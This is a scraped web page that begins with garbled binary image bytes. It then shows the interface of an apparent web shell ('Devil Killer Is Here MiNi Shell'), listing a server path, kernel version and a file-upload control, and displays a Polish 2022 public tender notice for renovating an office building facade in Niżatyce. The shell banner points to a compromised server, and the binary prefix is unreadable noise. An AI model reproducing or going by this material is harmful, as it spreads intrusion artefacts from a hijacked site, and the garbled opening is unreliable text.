JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220225/0006893201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Odnowa elewacji budynku biurowego na terenie bazy w Niżatycach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Zarząd Dróg w Przeworsku, ul. Słowackiego 17, 37-200 Przeworsk</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650903291</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Słowackiego 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Przeworsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">016 648 97 24</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">016 648 97 24</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pzd_przeworsk@wp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.powiatprzeworsk.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odnowa elewacji budynku biurowego na terenie bazy w Niżatycach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-52edabd2-963a-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00068932</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00022057/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Odnowa elewacji budynku biurowego na terenie bazy w Niżatycach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/Postepowania/32951c16-8d7a-4c82-97c3-cd4a6946bdde <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/Postepowania/32951c16-8d7a-4c82-97c3-cd4a6946bdde ePUAP:PZDPrzeworsk,<br/>pzd_przeworsk@wp.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">10.1. W niniejszym postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym<br/>a Wykonawcami, zgodnie z pkt 3.4. SWZ, odbywa się wyłącznie przy użyciu środków<br/>komunikacji elektronicznej za pośrednictwem:<br/> https://miniportal.uzp.gov.pl/Postepowania/32951c16-8d7a-4c82-97c3-cd4a6946bdde<br/> ePUAPu: PZD-Przeworsk<br/> poczty elektronicznej: pzd_przeworsk@wp.pl<br/>10.2. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu mini Portal oraz Warunkach korzystania<br/>z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>10.3. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>10.4. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń<br/>lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę<br/>ich przekazania na ePUAP.<br/>10.5. Sposób sporządzenia dokumentów elektronicznych lub elektronicznych kopii dokumentów musi<br/>być zgody z wymaganiami określonymi w:<br/> rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie(Dz.U. z 2020 r. poz. 2452).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna w związku z art. 13 RODO do<br/>zastosowania w celu związanym z postępowaniem o udzielenie zamówienia publicznego zawarta jest w rozdziale 3.7. SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">EZ.3311.4.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 112638,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Rozebranie obróbek blacharskich- parapety zewnętrzne <br/>2. Montaż obróbek blacharskich- parapety zewnętrzne <br/>3. Rusztowania zewnętrzne rurowe o wysokości do 14·m, <br/>4. Roboty przygotowawcze odbicie tynków zewnętrznych<br/>-przyjęto 30% pow. <br/>5. Uzupełnienie tynków zewnętrznych tynk renowacyjny cementowo wapienny<br/>6. Usunięcie warstwy tynku nakrapianego (tarabony)<br/>7. Gruntowanie podłoża <br/>8. Nałożenie podwójnej warstwy kleju elewacyjnego na podwójnej siatce <br/>9. Gruntowanie pod farbę<br/>10. Prace wykończeniowe przy tynkach renowacyjnych, malowanie 2-krotne - <br/>11. Rozebranie rur spustowych z blachy <br/>12. Rury spustowe z blachy tytan-cynk<br/><br/>Kod według CPV:<br/>45210000-2 - Roboty budowlane w zakresie budynków (kod główny)<br/>45443000-4 - Roboty elewacyjne<br/>45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie<br/>45320000-6 - Roboty izolacyjne<br/><br/>Szczegółowy opis przedmiotu zamówienia określają:<br/>Załącznik nr 4 do SWZ – Program prac<br/>Załącznik nr 5 do SWZ – Opinia konserwatorska<br/>Załącznik nr 6 do SWZ – Kosztorys ofertowy<br/>Załącznik nr 7 do SWZ – Przedmiar robót (przedmiar robót ma charakter pomocniczy)<br/>Załącznik nr 10 do SWZ – Projekt umowy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1. Zamawiający przy wyborze najkorzystniejszej oferty będzie<br/>stosował następujące kryteriaoceny ofert: Cena oferty brutto – waga 60% Gwarancja i rękojmia na<br/>instalacje, urządzenia i wykonane prace – waga 40%Oferty oceniane będą punktowo dla każdego<br/>kryterium oddzielnie. O wyborze najkorzystniejszejoferty zdecyduje największa liczba zdobytych<br/>punktów łącznie we wszystkich kryteriach.Podczas oceny ofert wartości przeliczane będą z<br/>dokładnością do dwóch miejsc po przecinku.P = C + G - łączna liczba zdobytych punktówgdzie:P –<br/>suma liczby punktów uzyskanych w kryteriach „Cena oferty brutto” i „Gwarancja i rękojmia na<br/>instalacje, urządzenia i wykonane prace”C – liczba punktów uzyskanych w kryterium „Cena oferty<br/>brutto” G – liczba punktów uzyskanych w kryterium „Gwarancja i rękojmia na instalacje, urządzenia i<br/>wykonane prace”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia na instalacje, urządzenia i wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1. W postępowaniu mogą wziąć udział Wykonawcy spełniający poniższe warunki:<br/>6.1.1. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 108<br/>ust 1 pkt 1-6 ustawy Pzp oraz art. 109 ust. 1 pkt 1 i 4 ww. ustawy.<br/>6.1.2. znajdują się w sytuacji ekonomicznej lub finansowej umożliwiającej realizację przedmiotu<br/>zamówienia – Wykonawca w okresie realizacji zamówienia musi posiadać ubezpieczenie<br/>od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej<br/>z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 100 000,00 zł.<br/>Zakres ubezpieczenia powinien obejmować zwłaszcza odpowiedzialność deliktową,<br/>kontraktową, odpowiedzialność cywilną pracodawcy za szkody wyrządzone pracownikom<br/>oraz osobom trzecim przebywającym w granicach terenu realizacji inwestycji. Ubezpieczenie<br/>obejmować powinno również szkody wyrządzone przez wszystkich podwykonawców<br/>(w rozumieniu art. 6471 Kodeksu cywilnego).<br/>6.1.3. posiadają zdolność techniczną do realizacji przedmiotu zamówienia –Wykonawca musi<br/>wykazać wykonanie co najmniej jednej roboty budowlanej, o wartości nie mniejszej<br/>niż 50 000,00 zł, mającej w swym zakresie remont elewacji lub całego budynku, rozbudowę lub przebudowę budynku, wykonanej nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem jej rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz których roboty te zostały<br/>wykonane.<br/>Przez jedną robotę budowlaną Zamawiający rozumie jeden kontrakt lub jedną umowę.<br/>remont elewacji lub całego budynku, rozbudowę lub przebudowę budynku. Wartości<br/>w walutach innych niż wskazane przez Zamawiającego należy przeliczyć według średniego<br/>kursu złotego w stosunku do euro tj. na podstawie obwieszczenia Prezesa Urzędu<br/>Zamówień Publicznych z dnia 1 stycznia 2021 r. (Monitor Polski poz. 11 z 2021 r.).<br/>Przeliczenia samodzielnie dokonuje Wykonawca.<br/>6.1.4. posiadają zdolność zawodową do realizacji przedmiotu zamówienia – Wykonawca musi<br/>dysponować osobą lub osobami posiadającymi aktualne uprawnienia budowlane<br/>do kierowania robotami budowlanymi w specjalnościach niezbędnych do<br/>prawidłowego wykonania przedmiotu zamówienia tj.:<br/>1) kierownika budowy posiadającego uprawnienia do kierowania robotami budowlanymi<br/>w specjalności konstrukcyjno-budowlanej lub odpowiadające im równoważne<br/>uprawnienia, od których nabycia minęły minimum pełne 3 lata, licząc do dnia otwarcia<br/>ofert,<br/>Za dysponowanie przez Wykonawcę osobami/osobą posiadającymi/posiadającą aktualne<br/>uprawnienia budowlane do kierowania robotami budowlanymi Zamawiający ma na myśli<br/>dysponowanie tymi osobami/tą osobą w sposób bezpośredni czyli gdy stosunek prawny<br/>łączy Wykonawcę bezpośrednio z daną osobą, w szczególności w przypadku umowy<br/>o pracę, samozatrudnienia czy umowy o świadczenie usług podpisanych bezpośrednio<br/>z osobą.<br/>Ilekroć Zamawiający wymaga określonych uprawnień budowlanych, rozumie przez<br/>to uprawnienia budowlane zapewniające prawo do wykonywania na terenie Polski zawodu<br/>inżyniera budownictwa wydane na podstawie ustawy z dnia 7 lipca 1994 r. Prawo budowlane<br/>(t.j. Dz. U. z 2020 r., poz. 1333 ze zm.) oraz odpowiadające im ważne uprawnienia<br/>budowlane, które zostały uznane na zasadach przewidzianych w ustawie z dnia 22 grudnia<br/>2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2020 r., poz. 220ze zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">9.1. W celu potwierdzenia spełniania warunków udziału w postępowaniu przez Wykonawcę,<br/>którego oferta została oceniona jako najkorzystniejsza, dot. zdolności technicznej lub<br/>zawodowej, Zamawiający zażąda:<br/>9.1.1. wykazu robót budowlanych stanowiącego Załącznik nr 8 do SWZ zgodnie z zapisami pkt.<br/>6.1.3. SWZ wraz z dowodami określającymi, czy roboty te zostały wykonane należycie<br/>tj. referencji bądź innych dokumentów wystawionych przez podmiot, na rzecz którego usługi<br/>były wykonywane, bądź oświadczenie Wykonawcy – jeżeli z uzasadnionych przyczyn<br/>o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać wyżej wymienionych<br/>dokumentów;<br/>9.1.2. wykazu stanowiącego Załącznik nr 9 do SWZ zawierającego wskazanie osoby/osób,<br/>która/które będzie/będą pełnić funkcję kierownika budowy i która/które będzie/będą<br/>uczestniczyła/uczestniczyły w wykonaniu zamówienia, zgodnie z zapisami w pkt 6.1.4.<br/>SWZ. Załącznik ten stanowi informację dotyczącą kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia tych osób niezbędnych do wykonania zamówienia, a także<br/>zakresu wykonywanych przez nich czynności oraz informację o podstawie dysponowania<br/>tymi osobami. Uprawnienia osoby/osób wymienionej/wymienionych w wykazie Wykonawca<br/>winien złożyć przed przekazaniem terenu budowy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">9.2. W celu potwierdzenia braku podstaw wykluczenia Wykonawcy, którego oferta została<br/>oceniona jako najkorzystniejsza, Zamawiający zażąda następujących dokumentów:<br/>9.2.1. informacji z Krajowego Rejestru Karnego w zakresie dotyczącym podstaw wykluczenia<br/>wskazanych w art. 108 ustawy Pzp, sporządzonej nie wcześniej niż 6 miesięcy przed jej<br/>złożeniem;<br/>9.2.2. zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że<br/>Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1<br/>ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem,<br/>a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem<br/>Zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu<br/>składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz<br/>z odsetkami lub grzywnami lub zawarł porozumienie w sprawie spłat tych należności<br/>9.2.3. zaświadczenia lub innego dokumentu właściwej terenowej jednostki organizacyjnej<br/>Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub<br/>właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia<br/>społeczne i zdrowotne w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem<br/>składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem, Zamawiający żąda złożenia dokumentów potwierdzających, że przed<br/>upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na<br/>ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł<br/>porozumienie w sprawie spłat tych należności;<br/>9.2.4. odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp,<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji. Jeżeli Wykonawca w pkt XIV Formularza oferty<br/>stanowiącego załącznik nr 1 do SWZ wpisał poprawny adres strony internetowej umożliwiającej Zamawiającemu bezpłatne pozyskanie ww. dokumentów, Wykonawca nie jest zobowiązany do ich złożenia;<br/>9.2.5. oświadczenia, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 13.1. Warunkiem udziału w postępowaniu jest wniesienie wadium, które do niniejszego zamówienia<br/>wynosi 1 300,00 zł (słownie: tysiąc trzysta złotych).<br/>13.2. Wadium wnosi się przed upływem terminu składnia ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2<br/>i 3 oraz ust. 2 ustawy Pzp.<br/>13.3. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących<br/>formach:<br/> pieniądzu,<br/> gwarancjach bankowych,<br/> gwarancjach ubezpieczeniowych,<br/> poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy<br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>13.4. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy: BS Przeworsk Nr 88 9106 0008 2001 0013 8439 0003<br/>13.5. W przypadku wniesienia wadium w pieniądzu, Zamawiający uzna za wniesione skutecznie,<br/>jeżeli wpływ 